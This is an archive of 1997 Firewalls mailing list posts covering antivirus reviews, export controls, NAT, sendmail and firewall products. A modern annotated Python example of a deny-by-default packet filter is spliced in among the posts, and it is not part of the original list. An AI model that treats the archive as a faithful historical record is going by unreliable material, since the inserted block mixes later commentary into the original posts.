As you obviously appreciate, liking the interface of a particular product is a poor basis for virus control. In this area, a nice interface may come a long way behind other criteria such as detection rate, tendency to false alarm, ease of distribution and administration, and other issues of which this isn't the best forum for discussion. McAfee has most of the market share and Symantec/Norton have a great deal of what's left, but neither package is necessarily the highest-rated among professionals.

> Any help would be
> appreciated.

Some pointers from the alt.comp.virus FAQ are included below.

--------------------include---------------------

There used to be a comprehensive set of product reviews at:
http://www.first.org/virus/virrevws/
but the page is being reorganized and it may have disappeared altogether.

A number of reputable vendors include comparative reviews, papers on testing etc. on their WWW/FTP servers: try
http://www.datafellows.com/
http://www.drsolomon.com/
among others.

Virus Bulletin comparative reviews are available from
http://www.virusbtn.com/Comparatives/
and information is also available on their testing protocols.

Product reviews and other kewl stuff from Robert Slade:
telnet://freenet.victoria.bc.ca
login as guest, give the command "go virus"

For a list of scanners that have received the "NCSA Approved" rating of the National Computer Security Association in the U.S.A. see
http://www.ncsa.com/avpdcert.html
The page also explains the certification procedure.

----------------------outclude--------------------------

NCSA certification for AV products isn't a bad idea in principle, but hasn't always been well-implemented, and is subject to some of the same misgivings voiced here about firewall certification. However, it's probably more use than asking your neighbour what he uses. B-)

Secure Computing have an alternative certification scheme in progress, and the January issue includes a 'bumper Anti-Virus review'. (US/Canada subscriptions 100016.2432@compuserve.com).

Possibly the best reviews are those done by Virus Bulletin, though. (www.virusbtn.com).

You might also like to check out the Virus Research Unit site at Tampere:
http://www.uta.fi/laitokset/virus/

The alt.comp.virus FAQ and some other relevant documents (including the Virus-L FAQ) are available from the web page in my signature.

--
David Harley                   \ | /    alt.comp.virus FAQ
D.Harley@icrf.icnet.uk          \ | /    & Anti-Virus Web Page
Support & Security Analyst       \ | /    Folk London On-Line gig-list
Imperial Cancer Research Fund ____\|/____ http://webworlds.co.uk/dharley/

From firewalls-owner Fri Jan 3 08:01:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26927 for firewalls-outgoing; Fri, 3 Jan 1997 07:32:27 -0800 (PST)
Received: from geocities.com (mail2.geocities.com [204.7.246.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA26908 for ; Fri, 3 Jan 1997 07:32:10 -0800 (PST)
Received: from 193.230.255.2.flex.ro (dial05.flex.ro [193.230.255.105]) by geocities.com (8.7.5/8.7.3) with ESMTP id HAA18320 for ; Fri, 3 Jan 1997 07:31:16 -0800 (PST)
Message-Id: <199701031531.HAA18320@geocities.com>
Reply-To:
From: "Gabriel Dura"
To:
Subject: Air Force Web Site Hacked - Reply
Date: Fri, 3 Jan 1997 17:31:58 +0200
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender:
firewalls-owner@GreatCircle.COM
Precedence: bulk

Read only media might be a solution but it is not a practical one for web sites which change their content very often. I have the following questions related to this subject:

- What if the OS is using a RAM disk?
- Isn't it possible to start a process which can alter the web file information while it is sent (only words, for example)?

I am not a firewall guru but I wonder if it wouldn't be possible to use a second computer as a mirror of the Web Site. This computer can supervise the original web site and monitor the audit log using remote access. In case it detects major modifications in the original web site or other kinds of unauthorized access it can perform the following operations:

- make a copy of the altered site for later analysis
- kill any processes which start writing, or attempt to write, in areas they shouldn't (system areas for instance)
- save the current system parameters for later analysis
- replace the altered site with the good one
- change sensitive passwords and save them for the administrator if possible
- alert the administrator

I think a system like that can prevent hacking without anyone from the outside being able to observe anything. If the above ideas are not correct please let me know.

Just a thought

Gabriel Dura
dura@geocities.com

From firewalls-owner Fri Jan 3 08:13:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA27052 for firewalls-outgoing; Fri, 3 Jan 1997 07:37:16 -0800 (PST)
Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA27037 for ; Fri, 3 Jan 1997 07:36:57 -0800 (PST)
Received: (qmail 7360 invoked from smtpd); 3 Jan 1997 15:36:22 -0000
Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 3 Jan 1997 15:36:22 -0000
Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id JAA10091; Fri, 3 Jan 1997 09:36:22 -0600
Received: by sonic.nmti.com; id AA13744; Fri, 3 Jan 1997 09:36:16 -0600
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9701031536.AA13744@sonic.nmti.com.nmti.com>
Subject: Re: The Looong Reach of US Crypto-Export Controls
To: relay1.shore.net@shore.net (Vin McLellan)
Date: Fri, 3 Jan 1997 09:36:16 -0600 (CST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Vin McLellan" at Jan 3, 97 03:22:17 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Yow!

> c.3. ``Software'' designed or modified to protect against malicious
> computer damage, e.g., viruses;

Technically this means that a copy of "login" that uses a plaintext password file with no encryption qualifies as a munition, because the purpose of access control is to protect against malicious computer damage. This makes Windows NT and any version of UNIX illegal to export as well, because both have access control and multiuser protection built in.

> a. ``Software'' required for the ``use'' of equipment excluded
> from control under the Note to 5A002.

You can always run Windows 3.1 on your laptop, right? Or if this isn't enough, embed the encryption as an inherent part of the O/S and bypass ITAR completely.
> b. ``Software'' providing any of the functions of equipment
> excluded from control under the Note to 5A002.

What equipment is this?

From firewalls-owner Fri Jan 3 08:50:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA29049 for firewalls-outgoing; Fri, 3 Jan 1997 08:26:31 -0800 (PST)
Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA29036 for ; Fri, 3 Jan 1997 08:25:55 -0800 (PST)
Message-Id: <199701031625.IAA29036@miles.greatcircle.com>
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4230; Fri, 03 Jan 97 11:25:06 EST
Date: Fri, 03 Jan 1997 11:24:28 EST
From: "John Silltow, Sys Security (GBWBSDHS) X5095 SILLTOJ - WEBS"
To: firewalls@greatcircle.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Subject: RE: VIRUS SCAN SOFTWARE
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Responding to Bill DeGan:

Although the type and frequency of viruses can be different in countries around the world, in the UK we have a publication called Virus Bulletin which regularly reviews virus scanners and does comparisons. In addition, the magazine Secure Computing has just undertaken a comparative review.

In general, the 100 per cent hit rates are achieved by Dr. Solomon's, Data Fellows F-Prot and Command F-Prot. Sophos Sweep, Thunderbyte and McAfee tend to come in around 99 per cent.

We use a 'sheepdip' machine with Dr. Solomon's and Sophos on it for all diskettes coming into the organisation. Once checked, the diskettes are given an authorisation code by Disknet. Individual machines have Dr. Solomon's running as a scanner and in memory. Gradually they are all getting the Disknet software as well, and at that time they are unable to accept a diskette which has not been through the authorisation process (i.e. scanned). The individual machines are also set up so that they cannot originally authenticate any diskette unless they conduct a low-level format on it first. This slows down software and data theft as a bonus.

Hope this helps. Come back to me if you need more.

John Silltow
gbwbsdhs@ibmmail.com

From: "Bill DeGan"
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 08:33:11 300
Subject: Virus Scan Software

Not sure if this is a proper question for this group, but here goes.

We are evaluating virus scan software to be installed on individual PCs and would welcome recommendations. We have folks that like McAfee and Norton but have no solid way to compare. Any help would be appreciated.

Bill DeGan
Walker Financial Corp.

From firewalls-owner Fri Jan 3 09:37:03 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA29761 for firewalls-outgoing; Fri, 3 Jan 1997 08:44:21 -0800 (PST)
Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA29728 for ; Fri, 3 Jan 1997 08:44:01 -0800 (PST)
Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id RAA11070; Fri, 3 Jan 1997 17:43:11 +0100
Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id RAA11306 for ; Fri, 3 Jan 1997 17:43:10 +0100
Date: Fri, 3 Jan 1997 17:43:09 +0100 (MET)
From: Carl Karlsson
X-Sender: ckn@wintermute.marievik.findata.se
To: "'Firewalls Mailing List'"
Subject: RE: NT NAT
In-Reply-To: <41FDA823FC5AD011A0970000E8D5C66771A6@mail.rc.on.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 3 Jan 1997, Russ wrote:
> You got anything intelligent to say on just why you think NAT offers ANY
> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL.
I'd like to know if and why this means that masquerading one's network behind a 'secured' host doesn't provide any added security over just connecting the network straight out? Or am I missing something here (not unusual :)?

I was under the impression that if I use some box (Linux with TIS fwtk for example, or that NT box perhaps?) masquerading my network and using 192.168.x.x addresses inside, I would be at least a little bit more secure than if I had all my w95/nt/unix machines directly connected to the internet?

(Not talking super-secure here, not flaming anyone, but just interested! Pointers do nicely if this is already well-known...)

Calle

From firewalls-owner Fri Jan 3 10:07:58 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA00295 for firewalls-outgoing; Fri, 3 Jan 1997 08:51:35 -0800 (PST)
Received: from exp2.is.xpark.pmh.org (exphub.is.xpark.pmh.org [198.215.78.104]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA00221 for ; Fri, 3 Jan 1997 08:50:56 -0800 (PST)
Received: from localhost by exp2.is.xpark.pmh.org (AIX 3.2/UCB 5.64/4.03) id AA38776; Fri, 3 Jan 1997 10:42:43 -0600
Message-Id: <32CD3702.58E@exphub.pmh.org>
Date: Fri, 03 Jan 1997 10:42:42 -0600
From: "Cary Conover(IS) 13897"
Organization: Parkland Memorial Hospital
X-Mailer: Mozilla 3.01Gold (X11; I; AIX 2)
Mime-Version: 1.0
To: Mario Misic
Cc: firewalls@greatcircle.com
Subject: Re: sendmail 8.8.4 with firewall
References: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mario Misic wrote:
>
> Hi !
>
> I am running sendmail-8.8.4 on AIX-3.2.5.
>
> My problem is how to configure sendmail-8.8.4 to send mail over my firewall
> server !
> I configure sendmail.cf like they said in README file but .......... ?
>
> Thanks.
>
> http://www.laus.hr/
>
> M.M

You need to get with the network administrator and find out which one of your network servers is the Mail Handler and if it is noted as such in the DNS. If it is, then sendmail should use this to send the mail to the firewall first and then the firewall forwards it on to the outside world. I would assume that the Firewall would be listed as an MX in the DNS as well. I am not sure on this one. I know I will get corrected if I am wrong.

--
Cary D. Conover
AIX Systems Administrator
Senior Systems Analyst
Parkland Memorial Hospital
Dallas, Texas
cconov@parknet.pmh.org
carydc@why.net
817-571-6694 Home Voice
817-571-6793 Data/Fax
817-360-8572 Mobile
214-590-0244 Work Voice
214-786-0282 Pager

From firewalls-owner Fri Jan 3 10:13:15 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA00517 for firewalls-outgoing; Fri, 3 Jan 1997 08:57:17 -0800 (PST)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA00507 for ; Fri, 3 Jan 1997 08:57:04 -0800 (PST)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id IAA28727 for ; Fri, 3 Jan 1997 08:58:42 -0800 (PST)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA09111; Fri, 3 Jan 97 08:55:58 PST
Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id IAA07294 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Fri, 3 Jan 1997 08:55:31 -0800 (PST)
Message-Id: <199701031655.IAA07294@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id ED12BEAB05141A6E88256414005C8705; Fri, 3 Jan 97 08:55:29 EDT
To: Lawrence Ting
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 3 Jan 97 8:52:36 EDT
Subject: Re: Any Recommendations?
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Firewall-1 will proxy when it needs to authenticate users going out (i.e. pop up a web page asking for username and password before it lets you out.) But, as a general purpose proxy (logging URLs, filtering content, caching, etc..) I believe it would make a poor choice. I don't know this from personal experience, having only used it in the stateful-packet-filter mode, but from the docs I've looked at, I don't think I'm incorrect.

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: lawrenceting @ www.uob.com.sg (Lawrence Ting) @ smtp
Date: 01/03/97 01:29:59 PM
Subject: Any Recommendations?

Good day,

I'm in the midst of evaluating BlackHole, Gauntlet and Firewall-1 as a proxy-based firewall, while evaluating Sunscreen, CISCO PIX and Proteon GTX Secure as an IP-less packet-filtering firewall. Firewall-1 seemed more like a packet-filtering firewall, while I have a hard time distinguishing a better choice between Blackhole and Gauntlet. As for Sunscreen, it is a definitely more expensive choice than the other two.

Can someone please kindly share your expertise or comments or experience on the above-mentioned products in terms of their functionalities?

Thanks in advance.

Lawrence TING
Network Security Officer

From firewalls-owner Fri Jan 3 10:50:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA08214 for firewalls-outgoing; Fri, 3 Jan 1997 10:01:16 -0800 (PST)
Received: from garcon.unicom.com (garcon.unicom.com [192.108.105.37]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA08192 for ; Fri, 3 Jan 1997 10:01:01 -0800 (PST)
Received: (from chip@localhost) by garcon.unicom.com (8.6.12/8.6.12) id MAA24783; Fri, 3 Jan 1997 12:03:19 -0600 (CST)
From: Chip Rosenthal
Message-Id: <199701031803.MAA24783@garcon.unicom.com>
Subject: Re: internal filtering router - filter config?
To: Firewalls@GreatCircle.COM
Date: Fri, 3 Jan 1997 12:03:19 -0600 (CST)
Cc: makoski@future.dreamscape.com
In-Reply-To: <199701030900.BAA03967@miles.greatcircle.com> from "Firewalls-Digest" at Jan 03, 1997 01:00:39 AM
X-Mailer: ELM [version 2.5 PL0a10]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: Steve Matkoski
> Subject: internal filtering router - filter config?
>
> What type of things would you filter on the internal router? or even
> the external router? I am going to be installing a firewall real soon
> and would really appreciate any help.

Unless I misunderstand, I think you ought to be asking what should be *allowed* rather than what should be filtered. Most people here would advocate a "deny unless specifically permitted" stance in your filter rules.

If you don't already have a firewall book, the Chapman & Zwicky book does a pretty good job on this stuff. They give a lot of attention to configuring the filter on a service-by-service basis.

--
Chip Rosenthal * Unicom Systems Development * URL: http://www.unicom.com/ * 4868D8BE10C86BDE 6017000BA783998E
Helmet good. Law bad.
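An added example, not code from the list, from Chip or from the Chapman & Zwicky book: a small Python model of the "deny unless specifically permitted" stance for a screening router's filter. Rules are checked in order, the first match decides, and a packet that no rule permits falls through to the default deny, which is what makes the service-by-service permits the whole policy rather than an afterthought. The internal network (10.1.0.0/16), the bastion address (192.0.2.10), the rule set and the sample packets are all constructed assumptions; the Cisco-style rendering at the end is one common way such a list is written out and is included only to show how the implicit deny becomes an explicit, logged last line.

```python
"""Screening-router filter with a "deny unless specifically permitted" stance.

Added example: ordered rule list, first match wins, implicit deny at the end.
The networks, bastion address and sample packets below are constructed.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    direction: str        # "in" = arriving from the Internet, "out" = leaving for it
    proto: str            # "tcp", "udp" or "icmp"
    src: str
    dst: str
    dport: int = 0        # destination port (0 for icmp)
    ack: bool = False     # TCP ACK bit set: part of an existing connection, not a new SYN


@dataclass(frozen=True)
class Rule:
    action: str           # "permit" or "deny"
    direction: str
    proto: str            # "tcp", "udp", "icmp" or "ip" (any protocol)
    src: IPv4Network
    dst: IPv4Network
    dport: Optional[int] = None   # None matches any destination port
    established: bool = False     # tcp only: match segments with ACK set
    comment: str = ""

    def matches(self, p: Packet) -> bool:
        if p.direction != self.direction:
            return False
        if self.proto != "ip" and p.proto != self.proto:
            return False
        if IPv4Address(p.src) not in self.src or IPv4Address(p.dst) not in self.dst:
            return False
        if self.dport is not None and p.dport != self.dport:
            return False
        if self.established and not (p.proto == "tcp" and p.ack):
            return False
        return True


ANY = IPv4Network("0.0.0.0/0")
INTERNAL = IPv4Network("10.1.0.0/16")      # constructed: the protected internal network
BASTION = IPv4Network("192.0.2.10/32")     # constructed: bastion host offering SMTP and HTTP

# Service-by-service permits; anything not listed is dropped by the final default.
RULES: List[Rule] = [
    Rule("deny", "in", "ip", INTERNAL, ANY, comment="anti-spoofing: internal source from outside"),
    Rule("permit", "in", "tcp", ANY, BASTION, dport=25, comment="SMTP to bastion"),
    Rule("permit", "in", "tcp", ANY, BASTION, dport=80, comment="HTTP to bastion"),
    Rule("permit", "in", "tcp", ANY, INTERNAL, established=True, comment="replies to connections opened inside"),
    Rule("permit", "out", "tcp", INTERNAL, ANY, comment="internal hosts may open TCP connections out"),
]


def filter_packet(rules: List[Rule], p: Packet) -> Tuple[str, str]:
    """First matching rule wins; no match falls through to the implicit deny."""
    for r in rules:
        if r.matches(p):
            return r.action, r.comment
    return "deny", "implicit default deny"


def to_cisco_acl(rules: List[Rule], direction: str = "in", number: int = 101) -> List[str]:
    """Render one direction of the rule set as IOS extended access-list lines
    (wildcard masks are inverted netmasks) and write the default deny out explicitly."""
    def addr(n: IPv4Network) -> str:
        if n.prefixlen == 0:
            return "any"
        if n.prefixlen == 32:
            return f"host {n.network_address}"
        return f"{n.network_address} {n.hostmask}"

    lines = []
    for r in rules:
        if r.direction != direction:
            continue
        line = f"access-list {number} {r.action} {r.proto} {addr(r.src)} {addr(r.dst)}"
        if r.dport is not None:
            line += f" eq {r.dport}"
        if r.established:
            line += " established"
        lines.append(line)
    lines.append(f"access-list {number} deny ip any any log")   # the implicit deny, made explicit and logged
    return lines


# Constructed sample traffic.
SAMPLES: List[Packet] = [
    Packet("in", "tcp", "203.0.113.5", "192.0.2.10", dport=25),             # SMTP to the bastion
    Packet("in", "tcp", "203.0.113.5", "10.1.0.20", dport=23),              # telnet straight to an internal host
    Packet("in", "tcp", "203.0.113.5", "10.1.0.20", dport=1234, ack=True),  # reply to an outbound connection
    Packet("in", "tcp", "10.1.0.7", "10.1.0.20", dport=25),                 # spoofed internal source address
    Packet("in", "udp", "203.0.113.5", "192.0.2.10", dport=53),             # DNS: no rule permits it
    Packet("out", "tcp", "10.1.0.20", "203.0.113.5", dport=80),             # internal host browsing out
]


def evaluate(rules: List[Rule] = RULES, packets: List[Packet] = SAMPLES) -> List[str]:
    """Return the action taken for each packet, in order."""
    return [filter_packet(rules, p)[0] for p in packets]


if __name__ == "__main__":
    for p in SAMPLES:
        action, why = filter_packet(RULES, p)
        print(f"{action:6} {p.direction:3} {p.proto:4} {p.src} -> {p.dst}:{p.dport}  ({why})")
    print()
    print("\n".join(to_cisco_acl(RULES)))
```

Two things to notice when running it: the inbound telnet to 10.1.0.20 and the inbound DNS to the bastion are dropped even though no rule mentions them, which is the point of the stance, and the "established" rule admits only segments with ACK set, so it lets replies back in without letting an outsider open a new connection to an internal host. Rule order matters: the anti-spoofing deny sits first so that a forged internal source can never reach a permit below it.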
From firewalls-owner Fri Jan 3 10:56:22 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09308 for firewalls-outgoing; Fri, 3 Jan 1997 10:13:01 -0800 (PST)
Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA09274 for ; Fri, 3 Jan 1997 10:12:40 -0800 (PST)
Received: by hidata.com; id AA13745; Fri, 3 Jan 97 10:12:12 PST
Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma013732; Fri, 3 Jan 97 10:11:46 -0800
Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF95F.796A2770@oscntsrv.hidata.com>; Fri, 3 Jan 1997 10:18:33 -0800
Message-Id:
From: "Stout, Bill"
To: "'Firewall List'"
Subject: RE: The Looong Reach of US Crypto-Export Controls
Date: Fri, 3 Jan 1997 10:18:32 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Friday, January 03, 1997 12:22 AM, Vin McLellan[SMTP:relay1.shore.net@shore.net] wrote:
> I earlier posted a message which quoted a well-informed Netizen who
> claimed that the new US Federal ERA regs (which transfer control of many
> encryption exports from the U.S. Dept. of State to the U.S. Commerce Dept)
> now explicitly forbid the unlicensed export of software "designed or
> modified to protect against malicious computer damage, e.g., viruses"
> (c.3., below)
>
> Tell the truth, I couldn't quite believe they had done it! (A
> whole new _class_ of export controls? Over very basic computer security
> tech, so vaguely described? Tucked into the fine print of a
> regulatory rewrite which the Administration has widely touted as a
> "compromise" with market-hungry US Industry and concerned compsec
> professionals!?! And with the DC rumor mill full of claims that the
> heavy-handed ERA language reflected the FBI's ambitions for a domestic GAK
> bill, not the NSA/DoD's spooky Infowar concerns.)

In an infowar environment, where Army Generals state they worry about 'Getting their butts kicked by long-haired hackers' (not exact quote), creating and sending computer viruses to disable a country's PCs, Servers, Routers, and other equipment is an important attack (against either state or industrial targets), and most useful these days in a U.S.-defined non-'real' war LIC (Low Intensity Conflict) such as Honduras (anyone remember?), Ethiopia, Bosnia, and against a U.S. Domestic group involved in an activity the Feds have proclaimed today's Politically correct 'War' on (Drugs/Guns/Bombs/Encryption/Domestic Violence/Wire fraud/[insert propaganda campaign here]). Any effort to inoculate foreign equipment would make infowar that much more difficult.

Creating a trojaned virus that internally launched SYN, POD (ping of death), boot sector corruption, and other system-disabling or morale-degrading events is much more cost effective than launching one or more multi-million dollar cruise missiles per telephone closet. Plus you can't just launch cruise missiles during a LIC, plus the U.S. usually ends up paying to rebuild what they blow up.

Rumours in the past accused our government of accidental release of biological viruses to the public, and the feds are now reviewing previously denied friendly troop exposure to Iraqi NBC (Nuclear/Biological/Chemical) weapons and the defoliant 'Agent Orange' used in the Vietnam LIC.

In order to prevent becoming a bystander casualty in some infowar action which is either announced on CNN or not, we need to do our best to protect our own systems against not just lamer and elite hackers who rarely do intentional damage, but against friendly accidents, direct state attacks, mercenaries (paid malicious hackers), and violent activist groups (ACT-UP, Environmental, Marxist, Anti-Abortionists, Nazi, Radical Militia, the ATF/FBI/IRS-Secret Service, etc).

Sorry for the verbosity.

Bill

From firewalls-owner Fri Jan 3 10:56:35 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA02520 for firewalls-outgoing; Fri, 3 Jan 1997 09:22:14 -0800 (PST)
Received: from newman (newman.aventail.com [38.225.141.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA02500 for ; Fri, 3 Jan 1997 09:21:59 -0800 (PST)
Received: from kramer.in.aventail.com.aventail.com (root@newman [192.168.1.1]) by newman (8.6.12/8.6.9) with SMTP id JAA21665; Fri, 3 Jan 1997 09:20:31 -0800
Date: Fri, 3 Jan 1997 09:20:31 -0800
Message-Id: <199701031720.JAA21665@newman>
From: "William M. Perry"
To: Denis Vella
cc: firewalls@greatcircle.com
Subject: Re: Securing a LAN
Reply-to: wmperry@aventail.com
X-Face: O~Rn;(l][/-o1sALg4A@xpE:9-"'IR[%;,,!m7

>I'm not sure if this is the right place for this question..... Does anyone
>have any info on how to secure traffic ( maybe encrypt ) between, say, a
>Windows Client and a Unix Server over an internal LAN while maintaining
>compatibility with existing applications?

This is definitely the right place to ask. You can currently do this with a SOCKS server and an auto-socksifier like AutoSOCKS [1] or SocksCap [2] for windows. I'll concentrate on AutoSOCKS because I know it better (of course).

AutoSOCKS & SocksCap both automatically socksify an existing application. With AutoSOCKS, you run it once at login, and it socksifies any application from then onward.
With SocksCap, you launch each application through it - same effect, just less transparent to the user.

With SOCKS v5, you can strongly authenticate or encrypt using a variety of methods. If you are using the aventail products, you have a few more choices. With publicly available code from NEC you can use Username/Password authentication, and control on a per-user basis who gets access to what. For server-to-server communication, you can use Kerberos via the GSS API - currently this is not available on the Windows client side though.

We have plugins for different authentication/encryption mechanisms as well, including CHAP to avoid sending your password in the clear on each connection, and the upcoming VPN server beta will support SSL. You can find the specifications for CHAP and (soon) SSL in your nearest internet-drafts repository (look for *marcvh*), or on the aventail web site [3].

-Bill P.

1 - http://www.aventail.com/
2 - http://www.socks.nec.com/
3 - http://www.aventail.com/educate/security.html

From firewalls-owner Fri Jan 3 12:02:39 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA15602 for firewalls-outgoing; Fri, 3 Jan 1997 11:00:23 -0800 (PST)
Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA15391 for ; Fri, 3 Jan 1997 10:59:23 -0800 (PST)
Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id KAA15825; Fri, 3 Jan 1997 10:55:31 -0800
To: firewalls@GreatCircle.COM
Path: cichlid
From: david.bolger@entropy.ie
Newsgroups: mail.firewalls
Subject: None
Date: 3 Jan 1997 10:55:29 -0800
Lines: 75
Message-ID: <5ajkn1$3v7@cichlid.cichlid.com>
NNTP-Posting-Host: cichlid.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Message-ID: <3a94b87696c81a61@deliver.cichlid.com>
Lines: 65
Xdeliver: processed on Fri Jan 3 10:55:20 PST 1997
Xdeliver: SENDER owner-fw-1-mailinglist@us.checkpoint.com
Xdeliver: to
Xdeliver: cc
Xdeliver: apparent_to
Xdeliver: from david.bolger@entropy.ie
X400-Received: by mta EntropyMHS in /PRMD=Entropy/ADMD=ENT/C=ie; Relayed; 03 Jan 97 17:07:07 +0000
X400-Received: by /PRMD=Entropy/ADMD=ENT/C=ie; Relayed; 03 Jan 97 17:07:07 +0000
Date: 03 Jan 97 17:07:09 +0000
Delivery-Date: 03 Jan 97 17:07:09 +0000
Message-Type: Multiple Part
X400-Originator: David.D.B.Bolger@x400.entropy.ie
X400-MTS-Identifier: [/PRMD=Entropy/ADMD=ENT/C=ie;ISOCOR-32a9d5a9-entropymhs]
X400-Recipients: owner-fw-1-mailinglist@us.checkpoint.com
X400-Recipients: fw-1-mailinglist@us.checkpoint.com
X400-Recipients: andy@hpsx1.indo.hp.com
Original-Encoded-Information-Types: IA5-Text
X400-Content-Type: P2-1984
Message-ID:
Importance: normal
Subject: RE: user authentication on FW-1 2.1
Autoforwarded: FALSE
To: owner-fw-1-mailinglist@us.checkpoint.com (Non Receipt Notification Requested)
To: fw-1-mailinglist@us.checkpoint.com (Non Receipt Notification Requested)
CC: andy@hpsx1.indo.hp.com (Non Receipt Notification Requested)
In-Reply-To: <0103084952-user authentication on FW-1 2.1* @MHS>
Conversion: Allowed
Conversion-With-Loss: Allowed
Alternate-Recipient: Prohibited
Content-Identifier: RE: user authen
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7Bit
Sender: owner-fw-1-mailinglist@us.checkpoint.com
Precedence: bulk

Hi folks,

I've been having the same problems with FW-1 ver 2.1c on NT ver 3.51. Everything works fine except for User or Client Authentication, with the same errors. Internal and OSPassword were turned on in the Object FireWall, and everything else looks fine. However, it isn't working. I've got it to work on a test box once, but when I made other changes, it no longer works. I've also got it to work on a version 2.1a, but it's flaky.

If anybody can shed some light, I'd appreciate it.

regards,
dave

---- owner-fw-1-mailinglist(a)us.checkpoint.com's Message ----

Hello everybody.

I have some problems with FW-1 2.1 user authentication or client authentication.
I've installed the FW-1 2.1 without any problems on Windows NT 3.51 and HP9000/712 running HP-UX 10.01, except for the user and client authentications. Several user auth methods have been tried, e.g. using the Internal FW-1 password or the OS password, but none worked. I always get the following error message: ".... does not support Internal password" or ".... does not support Unix password".

Has anybody experienced this kind of problem before? Or did I miss something here? Any hints would be highly appreciated.

Thanks a lot in advance for the help.

Best regards
Heri

From firewalls-owner Fri Jan 3 12:48:27 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA17568 for firewalls-outgoing; Fri, 3 Jan 1997 11:24:28 -0800 (PST)
Received: from ns1.ntshop.com ([207.91.166.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA17513 for ; Fri, 3 Jan 1997 11:24:03 -0800 (PST)
